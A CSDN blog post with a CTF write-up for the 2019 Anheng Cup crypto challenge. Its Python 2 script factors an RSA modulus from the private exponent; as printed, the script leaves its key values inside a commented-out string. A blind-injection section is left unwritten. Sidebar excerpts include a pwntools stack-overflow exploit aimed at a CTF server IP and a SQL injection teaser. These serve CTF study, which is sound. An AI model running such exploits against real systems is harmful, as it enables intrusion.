2019安恒杯5月赛赛密码学1以及对盲注的看法

最新推荐文章于 2024-08-28 11:29:07 发布
最新推荐文章于 2024-08-28 11:29:07 发布
阅读量715 收藏
点赞数
分类专栏: 题目 文章标签: 安恒杯 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/90967061
版权

本人有点出入密码学所以,对rsa有点了解其余…
这道题好像是让我求出(p+q)
因为太过投入所以是赛后才写的这个
ok上脚本

import random
from hashlib import md5
def gcd(a, b):
   if a < b:
     a, b = b, a
   while b != 0:
     temp = a % b
     a = b
     b = temp
   return a
 
def getpq(n,e,d):
	p = 1
	q = 1
	while p==1 and q==1:
		k = d * e - 1
		g = random.randint ( 0 , n )
		while p==1 and q==1 and k % 2 == 0:
			k /= 2
			y = pow(g,k,n)
			if y!=1 and gcd(y-1,n)>1:
				p = gcd(y-1,n)
				q = n/p
	return p,q
 
def main():
'''
	n=16352578963372306131642407541567045533766691177138375676491913897592458965544068296813122740126583082006556217616296009516413202833698268845634497478988128850373221853516973259086845725813424850548682503827191121548693288763243619033224322698075987667531863213468223654181658012754897588147027437229269098246969811226129883327598021859724836993626315476699384610680857047403431430525708390695622848315322636785398223207468754197643541958599210127261345770914514670199047435085714403641469016212958361993969304545214061560160267760786482163373784437641808292654489343487613446165542988382687729593384887516272690654309
	e=65537
	d=9459928379973667430138068528059438139092368625339079253289560577985304435062213121398231875832264894458314629575455553485752685643743266654630829957442008775259776311585654014858165341757547284112061885158006881475740553532826576260839430343960738520822367975528644329172668877696208741007648370045520535298040161675407779239300466681615493892692265542290255408673533853011662134953869432632554008235340864803377610352438146264524770710345273439724107080190182918285547426166561803716644089414078389475072103315432638197578186106576626728869020366214077455194554930725576023274922741115941214789600089166754476449453
'''	
	p,q = getpq(n,e,d)
	print  md5(str(p + q)).hexdigest()
 
if __name__ == '__main__':
	main()

这个直接跑出flag

浅谈盲注
和普通的注入不一样盲注的工程量要大很多很晚了还是明天再写吧

doudoudedi
关注
专栏目录
2019安恒杯赛Re部分wp
siphre
01-29 1518
Re:1 来玩蛇吧   题目给了两个文件AnhengRe.exe和AnhengRe.pyc。 Notepad++打开发现是python3.6编译的 直接走python逆向的流程   .exe反编译成.pyc。使用的工具是pyinstxtractor或archive_viewer(官方),得到的文件缺少了12字节文件头,下载一个python3.6,用010editor扒一个python...
安恒5赛&BJDCTF3th-逆向
re1wn
07-28 6126
萌新学习之路
密码学&安恒
qq_41509200的博客
02-22 608
爆破出
HarekazeCTF2019 baby_rop
最新发布
m0_73743784的博客
08-28 166
非常经典的 ROP。
2019安恒一赛web1-babygo
0nc3的博客
01-28 1842
web1-babygo 考察知识点: PHP反序列化 POP链构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP链构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考链接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 332
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
BugKu - pwn2
Casuall的博客
07-06 3705
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
安恒杯赛题目参赛源码+项目说明.zip
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 ...安恒杯赛题目参赛源码+项目说明.zip
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
2021“安恒·泰山杯”山东省网络安全大赛 (1).rar
12-07
2021“安恒·泰山杯”山东省网络安全大赛 CTF 真题
2018安恒杯10赛RE&amp;MISC周周练
qq_42192672的博客
11-18 3036
赛反正我是错过了,这次周周练有四道题来看看,菜鸡就该多学习 1.easytree 拖进linux,发现跑不起来,eng? file一下,结果发现是exe PEID查一下 upx壳,直接脱,拖进IDA,直接看main函数 依次分析一下函数吧,2400不知道是啥,198E里面就是欢迎我们的字符串 我们输入的的字符串长度要是15才行 最后我们运算一通之后字符串要转变为aW...
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2197
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
2019安恒七赛——MISC
Lemon's blog
07-17 1189
前言:作为一个小白,感觉安恒的题是真的难,但也要努力复现出来,也可以多学很多东西。 真正的CTFer 一张图片,还是之前的老思路,winehx查看,binwalk分离等等,但是都没有如何线索,再仔细观察图片,发现应该是高度被修改了,下面应该还隐藏有图片 查看一下被修改过后的高度 这里也不知道图片原高度为多少,就往大的方向整 我这里直接将05改为了0C,结果过大了 下方有空白,改成0A没有空...
【sql注入】简单实现二次注入
dfdhxb995397的博客
09-08 224
【sql注入】简单实现二次注入 本文转自:i春秋社区 测试代码1:内容详情页面 [PHP]纯文本查看复制代码 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 <?php i...
2018安恒杯11赛-Web writeup
CoolD's Blog
11-28 3045
心态炸了
bugku pwn2学习心得以及wp
欢迎来到神林的博客
08-25 630
拿到题目: file查看一下文件类型,可以看到 x86-64,以及 dynamically linked,所以 64位,动态连接的。 查看一下有没有开什么保护机制: 嘛都没开,直接放到64位IDA里面看一看。 看到敏感名称函数“getshell” 感觉能直接拿flag,方法就是找到一个地方跳转到getshell函数地址,查看一下地址为:0x400715 转手看main函数: 其中有一个re...
bugku CTF-练习平台 部分writeup
qq_26317875的博客
11-15 5399
俄罗斯套娃 来自宇宙的信号 银河战队出击
安恒X计划平台10赛逆向题BASE++题目思路
iqiqiya的博客
10-30 2896
这道题比赛时就看到了名字 没下载到 一直在找题目附件 发现52破解上yechen123师傅发了帖子 就下载下来分析了一波 现在来记录一下 IDA载入静态分析可知 关键代码就在main() 程序与我们拿到flag有关的步骤就是 0x01:判断my_str_len(ps:就是我们输入的字符串的长度)是否小于32 正确的输入最后算出来正好等于32 所以将会继续向下执行 0x0...
安恒12赛Web题解
0verWatch的博客
12-22 2931
吐槽一下 这次的web题目感觉完全是新手题,思路很直接,我就不掺和了,做完web就逃23333,继续完成密码学课程实验报告去了。。。但还是记录一下。 easy 这个题目考的是一个php反序列化的一个绕过,上来就给了一段代码,很简单 &amp;lt;?php @error_reporting(1); include 'flag.php'; class baby { public $f...
安恒堡垒机 root密码
09-08
安恒堡垒机是一款网络安全产品,用于管理和控制企业的网络设备,保障网络的安全。其中的root密码是用于登录和操作安恒堡垒机的超级管理员账户。 root密码在安恒堡垒机中具有最高的权限,只有拥有root密码的用户才能执行一些特殊的操作,如配置设备、修改权限、管理用户等。 为了确保安全性,建议设置强密码作为root密码,包括大小写字母、数字和特殊字符的组合,并定期更换密码。同时,也应该遵循一些常规的安全原则,如不将root密码告知他人、不在公共场所输入密码等。 对于忘记root密码的情况,我们可以通过以下方式进行找回或重置: 1. 利用默认的账户,如admin或administrator登录,并在设置中找到重置密码的选项。按照系统的提示进行操作,重新设置root密码。 2. 如果无法通过默认账户找回密码,可以尝试使用密码找回功能。输入已绑定的安全邮箱或手机号码,根据系统的提示进行操作,重新设置root密码。 3. 如果以上方法无法找回密码,可以联系安恒堡垒机的技术支持,提供必要的身份证明和证明所有权的相关材料,请求技术支持人员协助重置密码。 总之,root密码对于安恒堡垒机来说非常重要,我们应该妥善保管和管理,确保只有授权的人员能够使用和操作堡垒机,从而提高企业的网络安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值